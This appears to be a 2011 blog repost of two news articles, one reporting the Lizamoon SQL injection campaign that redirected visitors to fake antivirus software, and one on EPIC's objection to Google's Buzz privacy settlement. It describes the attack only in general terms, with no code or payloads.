Friday, April 1, 2011

Sites hit in massive web attack

Hundreds of thousands of websites appear to have been compromised by a massive cyber attack.

The hi-tech criminals used a well-known attack vector that exploits security loopholes on other sites to insert a link to their website.

Those visiting the criminals' webpage were told that their machines were infected with many different viruses.

Swift action by security researchers has managed to get the sites offering the sham software shut down.

Code control

Security firm Websense has been tracking the attack since it started on 29 March. The initial count of compromised sites was 28,000 sites but this has grown to encompass many times this number as the attack has rolled on.

Websense dubbed it the Lizamoon attack because that was the name of the first domain to which victims were re-directed. The fake software is called the Windows Stability Center.

The re-directions were carried out by what is known as an SQL injection attack. This succeeded because many servers keeping websites running do not filter the text being sent to them.

By formatting the text correctly it is possible to hide an instruction in it that is then injected into the databases these servers are running. In this case the injection meant a particular domain appeared as a re-direction link on webpages served up to visitors.

Reports suggest that the attackers are hitting sites using Microsoft SQL Server 2003 and 2005 and it is thought that a weakness in associated web software is proving vulnerable.

Ongoing analysis of the attack reveals that the attackers managed to inject code to display links to 21 separate domains. The exact numbers of sites hit by the attack is hard to judge but a Google search for the attackers' domains shows more than three million weblinks are displaying them.

Currently the re-directs are not working because the sites peddling the bogus software have been shut down.

Also hit were some web links connected with Apple's iTunes service. However, wrote Websense security researcher Patrick Runald on the firm's blog, this did not mean people were being redirected to the bogus software sites.

"The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer," he wrote.



Powered By WizardRSS.com | Full Text Feeds | Amazon PluginsHud-1

Privacy group wants Google cash

A leading US privacy group has filed an objection to agreements Google has reached over its social network Buzz.

The Buzz experiment was heavily criticised because it automatically enrolled all Gmail users without seeking prior permission.

Legal action was taken by a group of Gmail users, with Google agreeing to set up a $8.5m (�5.2m) privacy fund.

The Electronic Privacy Information Center (EPIC) is unhappy that it is not one of the beneficiaries of the fund.

This is despite the fact that it filed the original complaint about the service with the Federal Trade Commission.

It has asked for $1.75m (�1.09m), claiming that it is a more independent group than some of those being given money.

It said that the majority of funds would be allocated to groups that "receive support from Google for lobbying, consulting or similar services".

It asked the court to reject a deal "that encourages organisations to stand by quietly while others do the actual work of safeguarding internet privacy".

It declined to say which groups provided lobbying services.

The American Civil Liberties Union, the Electronic Frontier Foundation and the Brookings Institution are among those who have received funds.

Moving on

Earlier this week, Google reached an agreement with the US Federal Trade Commission, following the conclusion of its investigation.

The FTC said that Google wrongly used information from Google Mail users to create Buzz.

Google has agreed to undergo a privacy review once every two years for the next 20 years.

In a statement after the FTC settlement, Google said it had "put this incident behind us".

"We are 100% focused on ensuring that our new privacy procedures effectively protect the interests of all our users," it said.

It declined to comment directly on the EPIC case.

Apologies

Buzz was launched as an application within Gmail in February 2010.

Like rival Facebook, it allowed users to post status updates, share content and read and comment on friends' posts.

But it also gave users a ready-made circle of friends based on the people they most frequently e-mailed.

This list could automatically be made public, which privacy experts said could be a huge problem for journalists, businesses or people having an illicit affair.

Following anger from users, Google made changes and apologised for insufficient testing of the service.



Powered By WizardRSS.com | Full Text Feeds | Amazon PluginsHud-1